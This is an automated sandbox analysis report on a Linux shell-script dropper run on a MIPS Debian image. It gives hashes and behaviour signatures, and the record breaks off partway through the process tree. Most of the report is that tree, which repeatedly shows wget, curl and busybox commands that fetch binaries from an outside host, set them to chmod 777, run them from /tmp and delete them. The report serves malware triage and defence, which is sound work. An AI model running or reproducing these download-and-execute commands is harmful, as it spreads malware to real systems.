Analysis
-
max time kernel
79s -
max time network
81s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mips image:debian9-mipsbe-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
29/10/2024, 02:30
Static task
static1
Behavioral task
behavioral1
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
-
Size
10KB
-
MD5
d41afa47fc6a06a1cfb7b25f1b6510db
-
SHA1
1ef345877ccc2780055713bec262b92657b1e4a1
-
SHA256
754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a
-
SHA512
5ce676421868d2fd93aaf0307d70c8f856c56a53859c0275e01f4c1fe15644ee25c18c06208b6e0a579333df7622d73b330cf65c898bb939f2f4fd773f4de320
-
SSDEEP
96:YlFdLqi3SYL4L5RK/VV1oLDfVVjV/VBziTzDYmLxi2mDxTvni6iUpBYKCak8LHbN:SI6/2FO1Y0q0/cl1GC
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Reads runtime system information
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:716
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:740
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:741
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:744
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:747
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:748
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:751
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:757
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:779
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:785
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:788
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:789
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:809
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:815
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:816
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:819
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:824
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:830
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:834
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:835
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:852
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
PID:853
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:874
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:879
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:883
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:886
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:887
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:890
-
-
/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:894
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:895
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:898
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:916
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:917
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:920
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:927
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:946
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:947
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:950
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:953
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:954
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:957
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:960
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:961
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:964
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:967
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:968
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:971
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:974
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:975
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:978
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:994
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:998
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
PID:999
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1000
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
PID:1002
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:1003
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:1004
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:1006
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:1007
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1008
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:1013
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1014
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1015
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:1017
-
-
